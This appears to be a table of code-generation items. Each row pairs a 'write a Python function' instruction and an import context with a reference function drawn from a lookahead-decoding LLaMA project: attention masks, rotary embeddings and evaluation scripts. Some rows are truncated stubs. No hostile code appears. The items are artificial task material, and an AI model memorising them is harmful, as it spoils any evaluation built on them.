188,471 | import torch
import os
from .decoding import CONFIG_MAP
CONFIG_MAP = {}
def get_device():
if "LOCAL_RANK" not in CONFIG_MAP:
return 0
local_rank = CONFIG_MAP["LOCAL_RANK"]
return local_rank | null |
188,472 | import torch
import os
from .decoding import CONFIG_MAP
CONFIG_MAP = {}
def distributed():
return "DIST_WORKERS" in CONFIG_MAP and CONFIG_MAP["DIST_WORKERS"] > 1 | null |
188,473 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
def _get_unpad_data(attention_mask):
seqlens_in_batch = attention_mask.sum(dim=-1, dtype=torch.int32)
indices = torch.nonzero(attention_mask.flatten(), as_tuple=False).flatten()
max_seqlen_in_batch = seqlens_in_batch.max().item()
cu_seqlens = F.pad(torch.cumsum(seqlens_in_batch, dim=0, dtype=torch.torch.int32), (1, 0))
return (
indices,
cu_seqlens,
max_seqlen_in_batch,
) | null |
188,474 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
def _expand_mask(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None):
warnings.warn(
"Calling `transformers.models.llama.modeling_llama._prepare_4d_attention_mask` is deprecated and will be removed in v4.37. Use `transformers.modeling_attn_mask_utils._prepare_4d_attention_mask"
)
return _prepare_4d_attention_mask(mask=mask, dtype=dtype, tgt_len=tgt_len) | null |
188,475 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
The provided code snippet includes necessary dependencies for implementing the `_make_causal_mask` function. Write a Python function `def _make_causal_mask( input_ids_shape: torch.Size, dtype: torch.dtype, device: torch.device, past_key_values_length: int = 0 )` to solve the following problem:
Make causal mask used for bi-directional self-attention.
Here is the function:
def _make_causal_mask(
input_ids_shape: torch.Size, dtype: torch.dtype, device: torch.device, past_key_values_length: int = 0
):
"""
Make causal mask used for bi-directional self-attention.
"""
bsz, tgt_len = input_ids_shape
mask = torch.full((tgt_len, tgt_len), torch.finfo(dtype).min, device=device)
mask_cond = torch.arange(mask.size(-1), device=device)
mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0)
mask = mask.to(dtype)
if past_key_values_length > 0:
mask = torch.cat([torch.zeros(tgt_len, past_key_values_length, dtype=dtype, device=device), mask], dim=-1)
return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length) | Make causal mask used for bi-directional self-attention. |
188,476 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
The provided code snippet includes necessary dependencies for implementing the `j_make_causal_mask_multilevel` function. Write a Python function `def j_make_causal_mask_multilevel( level_sizes: list,is_prefill:bool, WINDOW_SIZE: int, guess : list, guess_size: int, not_seq:bool, continue_all:bool,input_ids_shape: torch.Size, dtype: torch.dtype, la_mask_offset:int, device: torch.device, past_key_values_length: int = 0 )` to solve the following problem:
Make causal mask used for bi-directional self-attention.
Here is the function:
def j_make_causal_mask_multilevel(
level_sizes: list,is_prefill:bool, WINDOW_SIZE: int, guess : list, guess_size: int, not_seq:bool, continue_all:bool,input_ids_shape: torch.Size, dtype: torch.dtype, la_mask_offset:int, device: torch.device, past_key_values_length: int = 0
):
"""
Make causal mask used for bi-directional self-attention.
"""
bsz, tgt_len = input_ids_shape
mask = torch.full((tgt_len, tgt_len), torch.finfo(dtype).min, device=device)
if is_prefill:
mask_cond = torch.arange(mask.size(-1), device=device)
mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0)
mask = mask.to(dtype)
assert past_key_values_length == 0
assert guess is None
return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length)
tiny_mask_size = level_sizes[-1] # + 1
mask_cond = torch.arange(tiny_mask_size, device=device)
hm = mask_cond < (mask_cond + 1).view(tiny_mask_size, 1)
level_offset = tgt_len - (sum(level_sizes) + 1) - (len(guess) if guess is not None else 0) #offset when you guess multiple tokens and not copy kv-cache
dist_offset = (1 + level_sizes[0] - level_sizes[-1]) #offset for distributed inference
assert dist_offset>=0 and level_offset>=0
if guess is not None:
lguess = len(guess)
if guess_size == 2:
small_m = torch.tensor([0, torch.finfo(dtype).min]).repeat(lguess // 2)[:-1]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m, -1)
elif guess_size == 3:
small_m1 = torch.tensor([0, 0, torch.finfo(dtype).min]).repeat(lguess // 3)[:-1]
small_m2 = torch.tensor([0, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 3)[:-2]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m1, -1).diagonal_scatter(small_m2, -2)
elif guess_size == 4:
small_m1 = torch.tensor([0, 0, 0, torch.finfo(dtype).min]).repeat(lguess // 4)[:-1]
small_m2 = torch.tensor([0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 4)[:-2]
small_m3 = torch.tensor([0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 4)[:-3]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m1, -1).diagonal_scatter(small_m2, -2).diagonal_scatter(small_m3, -3)
elif guess_size == 5:
small_m1 = torch.tensor([0, 0, 0, 0, torch.finfo(dtype).min]).repeat(lguess // 5)[:-1]
small_m2 = torch.tensor([0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 5)[:-2]
small_m3 = torch.tensor([0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 5)[:-3]
small_m4 = torch.tensor([0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 5)[:-4]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m1, -1).diagonal_scatter(small_m2, -2).diagonal_scatter(small_m3, -3).diagonal_scatter(small_m4, -4)
elif guess_size == 6:
small_m1 = torch.tensor([0, 0, 0, 0, 0, torch.finfo(dtype).min]).repeat(lguess // 6)[:-1]
small_m2 = torch.tensor([0, 0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 6)[:-2]
small_m3 = torch.tensor([0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 6)[:-3]
small_m4 = torch.tensor([0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 6)[:-4]
small_m5 = torch.tensor([0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 6)[:-5]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m1, -1).diagonal_scatter(small_m2, -2).diagonal_scatter(small_m3, -3).diagonal_scatter(small_m4, -4).diagonal_scatter(small_m5, -5)
elif guess_size == 7:
small_m1 = torch.tensor([0, 0, 0, 0, 0, 0, torch.finfo(dtype).min]).repeat(lguess // 7)[:-1]
small_m2 = torch.tensor([0, 0, 0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 7)[:-2]
small_m3 = torch.tensor([0, 0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 7)[:-3]
small_m4 = torch.tensor([0, 0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 7)[:-4]
small_m5 = torch.tensor([0, 0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 7)[:-5]
small_m6 = torch.tensor([0, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min, torch.finfo(dtype).min]).repeat(lguess // 7)[:-6]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0).diagonal_scatter(small_m1, -1).diagonal_scatter(small_m2, -2).diagonal_scatter(small_m3, -3).diagonal_scatter(small_m4, -4).diagonal_scatter(small_m5, -5).diagonal_scatter(small_m6, -6)
else:
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].fill_diagonal_(0)
for i in range(guess_size - 1): #7 : 0 - 5
small_l = [0] * (guess_size - i - 1) + [torch.finfo(dtype).min] * (i + 1)
small_m = torch.tensor(small_l).repeat(lguess // guess_size)[:-1 - i]
mask[-lguess:,-lguess:] = mask[-lguess:,-lguess:].diagonal_scatter(small_m, -1 - i)
#assert False
mask[-lguess:,:level_offset + 1] = 0
else:
lguess = 0
all_offset = level_offset + dist_offset
if all_offset > 0:
mask_offset = torch.arange(all_offset, device=device)
moff = mask_offset < (mask_offset + 1).view(all_offset, 1)
mask[:all_offset, :all_offset].masked_fill_(moff, 0) #fill level_offset + dist_offset with causal mask
#
mask[all_offset:-lguess+mask.size(0),:all_offset] = 0
#assert tgt_len == sum(level_sizes) + 1 , f"tgt levels not equal {tgt_len} {level_sizes} {la_mask_offset}"
for ll in range(len(level_sizes)):
if ll > 0:
assert level_sizes[ll] == tiny_mask_size
mask[all_offset+tiny_mask_size*ll:all_offset+tiny_mask_size*(ll+1),all_offset:all_offset+tiny_mask_size].masked_fill_(hm, 0)
for row in range(1, ll + 1):
mask[all_offset+tiny_mask_size*ll:all_offset+tiny_mask_size*(ll+1),all_offset+tiny_mask_size*row:all_offset+tiny_mask_size*(row+1)].fill_diagonal_(0)
if past_key_values_length > 0 or la_mask_offset > 0:
mask = torch.cat([torch.zeros(tgt_len, past_key_values_length + la_mask_offset, dtype=dtype, device=device), mask], dim=-1)
return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length + la_mask_offset) | Make causal mask used for bi-directional self-attention. |
188,477 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
def rotate_half(x):
"""Rotates half the hidden dims of the input."""
x1 = x[..., : x.shape[-1] // 2]
x2 = x[..., x.shape[-1] // 2 :]
return torch.cat((-x2, x1), dim=-1)
The provided code snippet includes necessary dependencies for implementing the `apply_rotary_pos_emb` function. Write a Python function `def apply_rotary_pos_emb(q, k, cos, sin, position_ids, unsqueeze_dim=1)` to solve the following problem:
Applies Rotary Position Embedding to the query and key tensors. Args: q (`torch.Tensor`): The query tensor. k (`torch.Tensor`): The key tensor. cos (`torch.Tensor`): The cosine part of the rotary embedding. sin (`torch.Tensor`): The sine part of the rotary embedding. position_ids (`torch.Tensor`): The position indices of the tokens corresponding to the query and key tensors. For example, this can be used to pass offsetted position ids when working with a KV-cache. unsqueeze_dim (`int`, *optional*, defaults to 1): The 'unsqueeze_dim' argument specifies the dimension along which to unsqueeze cos[position_ids] and sin[position_ids] so that they can be properly broadcasted to the dimensions of q and k. For example, note that cos[position_ids] and sin[position_ids] have the shape [batch_size, seq_len, head_dim]. Then, if q and k have the shape [batch_size, heads, seq_len, head_dim], then setting unsqueeze_dim=1 makes cos[position_ids] and sin[position_ids] broadcastable to the shapes of q and k. Similarly, if q and k have the shape [batch_size, seq_len, heads, head_dim], then set unsqueeze_dim=2. Returns: `tuple(torch.Tensor)` comprising of the query and key tensors rotated using the Rotary Position Embedding.
Here is the function:
def apply_rotary_pos_emb(q, k, cos, sin, position_ids, unsqueeze_dim=1):
"""Applies Rotary Position Embedding to the query and key tensors.
Args:
q (`torch.Tensor`): The query tensor.
k (`torch.Tensor`): The key tensor.
cos (`torch.Tensor`): The cosine part of the rotary embedding.
sin (`torch.Tensor`): The sine part of the rotary embedding.
position_ids (`torch.Tensor`):
The position indices of the tokens corresponding to the query and key tensors. For example, this can be
used to pass offsetted position ids when working with a KV-cache.
unsqueeze_dim (`int`, *optional*, defaults to 1):
The 'unsqueeze_dim' argument specifies the dimension along which to unsqueeze cos[position_ids] and
sin[position_ids] so that they can be properly broadcasted to the dimensions of q and k. For example, note
that cos[position_ids] and sin[position_ids] have the shape [batch_size, seq_len, head_dim]. Then, if q and
k have the shape [batch_size, heads, seq_len, head_dim], then setting unsqueeze_dim=1 makes
cos[position_ids] and sin[position_ids] broadcastable to the shapes of q and k. Similarly, if q and k have
the shape [batch_size, seq_len, heads, head_dim], then set unsqueeze_dim=2.
Returns:
`tuple(torch.Tensor)` comprising of the query and key tensors rotated using the Rotary Position Embedding.
"""
cos = cos[position_ids].unsqueeze(unsqueeze_dim)
sin = sin[position_ids].unsqueeze(unsqueeze_dim)
q_embed = (q * cos) + (rotate_half(q) * sin)
k_embed = (k * cos) + (rotate_half(k) * sin)
return q_embed, k_embed | Applies Rotary Position Embedding to the query and key tensors. Args: q (`torch.Tensor`): The query tensor. k (`torch.Tensor`): The key tensor. cos (`torch.Tensor`): The cosine part of the rotary embedding. sin (`torch.Tensor`): The sine part of the rotary embedding. position_ids (`torch.Tensor`): The position indices of the tokens corresponding to the query and key tensors. For example, this can be used to pass offsetted position ids when working with a KV-cache. unsqueeze_dim (`int`, *optional*, defaults to 1): The 'unsqueeze_dim' argument specifies the dimension along which to unsqueeze cos[position_ids] and sin[position_ids] so that they can be properly broadcasted to the dimensions of q and k. For example, note that cos[position_ids] and sin[position_ids] have the shape [batch_size, seq_len, head_dim]. Then, if q and k have the shape [batch_size, heads, seq_len, head_dim], then setting unsqueeze_dim=1 makes cos[position_ids] and sin[position_ids] broadcastable to the shapes of q and k. Similarly, if q and k have the shape [batch_size, seq_len, heads, head_dim], then set unsqueeze_dim=2. Returns: `tuple(torch.Tensor)` comprising of the query and key tensors rotated using the Rotary Position Embedding. |
188,478 | import math
from typing import List, Optional, Tuple, Union
import numpy as np
import einops, warnings
import torch
import torch.nn.functional as F
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from transformers.activations import ACT2FN
from transformers.cache_utils import Cache, DynamicCache
from transformers.modeling_attn_mask_utils import (
AttentionMaskConverter,
_prepare_4d_attention_mask,
_prepare_4d_causal_attention_mask,
_prepare_4d_causal_attention_mask_for_sdpa,
)
from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast, SequenceClassifierOutputWithPast
from transformers.modeling_utils import PreTrainedModel
from transformers.pytorch_utils import ALL_LAYERNORM_LAYERS, is_torch_greater_or_equal_than_1_13
from transformers.utils import (
add_start_docstrings,
add_start_docstrings_to_model_forward,
is_flash_attn_2_available,
is_flash_attn_greater_or_equal_2_10,
logging,
replace_return_docstrings,
)
from transformers.utils.import_utils import is_torch_fx_available
from transformers.models.llama.configuration_llama import LlamaConfig
The provided code snippet includes necessary dependencies for implementing the `repeat_kv` function. Write a Python function `def repeat_kv(hidden_states: torch.Tensor, n_rep: int) -> torch.Tensor` to solve the following problem:
This is the equivalent of torch.repeat_interleave(x, dim=1, repeats=n_rep). The hidden states go from (batch, num_key_value_heads, seqlen, head_dim) to (batch, num_attention_heads, seqlen, head_dim)
Here is the function:
def repeat_kv(hidden_states: torch.Tensor, n_rep: int) -> torch.Tensor:
"""
This is the equivalent of torch.repeat_interleave(x, dim=1, repeats=n_rep). The hidden states go from (batch,
num_key_value_heads, seqlen, head_dim) to (batch, num_attention_heads, seqlen, head_dim)
"""
batch, num_key_value_heads, slen, head_dim = hidden_states.shape
if n_rep == 1:
return hidden_states
hidden_states = hidden_states[:, :, None, :, :].expand(batch, num_key_value_heads, n_rep, slen, head_dim)
return hidden_states.reshape(batch, num_key_value_heads * n_rep, slen, head_dim) | This is the equivalent of torch.repeat_interleave(x, dim=1, repeats=n_rep). The hidden states go from (batch, num_key_value_heads, seqlen, head_dim) to (batch, num_attention_heads, seqlen, head_dim) |
188,479 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
def get_model_answers(
model_path,
model_id,
questions,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp_ds,
use_tp,
use_flash,
do_sample
):
def run_eval(
model_path,
model_id,
question_file,
question_begin,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
num_gpus_total,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp,
use_tp_ds,
use_flash,
do_sample
):
questions = load_questions(question_file, question_begin, question_end)
# random shuffle the questions to balance the loading
###not shuffle
#random.shuffle(questions)
# Split the question file into `num_gpus` files
assert num_gpus_total % num_gpus_per_model == 0
get_answers_func = get_model_answers
chunk_size = len(questions) // (num_gpus_total // num_gpus_per_model)
ans_handles = []
for i in range(0, len(questions), chunk_size):
ans_handles.append(
get_answers_func(
model_path,
model_id,
questions[i : i + chunk_size],
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype=dtype,
debug=debug,
cache_dir=cache_dir,
cpu_offloading=cpu_offloading,
use_tp=use_tp,
use_pp=use_pp,
use_tp_ds=use_tp_ds,
use_flash=use_flash,
do_sample=do_sample
)
) | null |
188,480 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
The provided code snippet includes necessary dependencies for implementing the `reorg_answer_file` function. Write a Python function `def reorg_answer_file(answer_file)` to solve the following problem:
Sort by question id and de-duplication
Here is the function:
def reorg_answer_file(answer_file):
"""Sort by question id and de-duplication"""
answers = {}
with open(answer_file, "r") as fin:
for l in fin:
qid = json.loads(l)["question_id"]
answers[qid] = l
qids = sorted(list(answers.keys()))
with open(answer_file, "w") as fout:
for qid in qids:
fout.write(answers[qid]) | Sort by question id and de-duplication |
188,481 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from datasets import load_dataset
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
def get_model_answers(
model_path,
model_id,
questions,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp_ds,
use_tp,
use_flash,
do_sample
):
devices = os.environ.get("CUDA_VISIBLE_DEVICES", "0").split(",")
print("configuration: ", "flash attn: ", use_flash, " HF PP: ", use_pp, " DS TP: ", use_tp_ds, " GPUS: ", devices)
ds_local_rank = int(os.getenv('LOCAL_RANK', '0'))
if use_pp:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda",
device_map="balanced",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
elif use_tp_ds:
import deepspeed
torch.cuda.set_device(int(os.getenv('LOCAL_RANK', '0')))
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device_map="cpu",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
model = deepspeed.init_inference(
model,
mp_size=int(os.getenv("WORLD_SIZE", "1")),
dtype=torch.half
)
else:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda:{lade.get_device()}",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
#model = AutoModelForCausalLM.from_pretrained(model_path, config=cfg, torch_dtype=torch.float16, device_map=lade.get_device())
model.tokenizer = tokenizer
overall_time = 0
overall_tp = 0
overall_gen = 0
count_gen = 0
stats = {}
for question_idx, question in enumerate(tqdm(questions)):
stats[question_idx] = {} #
choices = []
for i in range(num_choices):
torch.manual_seed(i)
conv = get_conversation_template(model_id)
turns = []
prompts = []
for j in range(1):
prompt = f'''[INST] <<SYS>>
You are an intelligent chatbot. Answer the questions only using the following context:
{question}
Here are some rules you always follow:
- Generate human readable output, avoid creating output with gibberish text.
- Generate only the requested output, don't include any other language before or after the requested output.
- Never say thank you, that you are happy to help, that you are an AI agent, etc. Just answer directly.
- Generate professional language typically used in business documents in North America.
- Never generate offensive or foul language.
<</SYS>>
Briefly summarize the given context. [/INST]
Summary: '''
prompts.append(prompt)
input_ids = tokenizer([prompt]).input_ids
#print("len: ", len(input_ids[0]))
if len(input_ids[0]) > 2048: #skip input len > 2048 tokens
continue
# some models may error out when generating long outputs
if True:
if do_sample:
start_time = time.time()
output_ids = model.generate(torch.as_tensor(input_ids).cuda(), max_new_tokens=max_new_token, do_sample=True, top_k=0, temperature=1.0, top_p=1.0)
end_time = time.time()
else:
start_time = time.time()
output_ids = model.generate(torch.as_tensor(input_ids).cuda(), max_new_tokens=max_new_token, do_sample=False, top_k=0)
end_time = time.time()
gap_time = end_time - start_time
tokens = output_ids.numel() - len(input_ids[0])
overall_time += gap_time
overall_gen += tokens
overall_tp += tokens / gap_time
count_gen += 1
stats[question_idx][j] = [gap_time, tokens]
if lade.get_device() == 0 and ds_local_rank == 0:
print([f"step {i} turn {j} time: ", gap_time, " generated tokens: ", tokens, " throughput: " , tokens / gap_time])
if model.config.is_encoder_decoder:
output_ids = output_ids[0]
else:
output_ids = output_ids[0][len(input_ids[0]) :]
# be consistent with the template's stop_token_ids
if conv.stop_token_ids:
stop_token_ids_index = [
i
for i, id in enumerate(output_ids)
if id in conv.stop_token_ids
]
if len(stop_token_ids_index) > 0:
output_ids = output_ids[: stop_token_ids_index[0]]
output = tokenizer.decode(
output_ids,
spaces_between_special_tokens=False,
)
if conv.stop_str and output.find(conv.stop_str) > 0:
output = output[: output.find(conv.stop_str)]
for special_token in tokenizer.special_tokens_map.values():
if isinstance(special_token, list):
for special_tok in special_token:
output = output.replace(special_tok, "")
else:
output = output.replace(special_token, "")
output = output.strip()
if conv.name == "xgen" and output.startswith("Assistant:"):
output = output.replace("Assistant:", "", 1).strip()
#print("output: ", output)
'''
except RuntimeError as e:
print("ERROR question ID: ", question["question_id"])
output = "ERROR"
'''
turns.append(output)
choices.append({"index": i, "turns": turns, "prompts" : prompts})
if lade.get_device() == 0 and ds_local_rank == 0:
# Dump answers
os.makedirs(os.path.dirname(answer_file), exist_ok=True)
with open(os.path.expanduser(answer_file), "a") as fout:
ans_json = {
"question_id": question_idx,
"answer_id": shortuuid.uuid(),
"model_id": model_id,
"choices": choices,
"tstamp": time.time(),
}
fout.write(json.dumps(ans_json) + "\n")
#if question_idx == 1:
# break
if lade.get_device() == 0 and ds_local_rank == 0:
torch.save(stats[question_idx], answer_file + ".pt")
print("LOG SAVE TO ", answer_file + ".pt")
print(f"AVERAGE THROUGHPUT1 {overall_tp / count_gen} AVERAGE THROUGHPUT2 {overall_gen / overall_time} STAT {[overall_tp, count_gen, overall_gen, overall_time]}")
lade.log_history()
lade.save_log(answer_file + "-lade-log.pt")
def run_eval(
model_path,
model_id,
question_file,
question_begin,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
num_gpus_total,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp,
use_tp_ds,
use_flash,
do_sample
):
questions = load_dataset("EdinburghNLP/xsum", split="validation", streaming=False)["document"][question_begin:question_end]
# random shuffle the questions to balance the loading
###not shuffle
#random.shuffle(questions)
# Split the question file into `num_gpus` files
assert num_gpus_total % num_gpus_per_model == 0
get_answers_func = get_model_answers
chunk_size = len(questions) // (num_gpus_total // num_gpus_per_model)
ans_handles = []
for i in range(0, len(questions), chunk_size):
ans_handles.append(
get_answers_func(
model_path,
model_id,
questions[i : i + chunk_size],
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype=dtype,
debug=debug,
cache_dir=cache_dir,
cpu_offloading=cpu_offloading,
use_tp=use_tp,
use_pp=use_pp,
use_tp_ds=use_tp_ds,
use_flash=use_flash,
do_sample=do_sample
)
) | null |
188,482 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
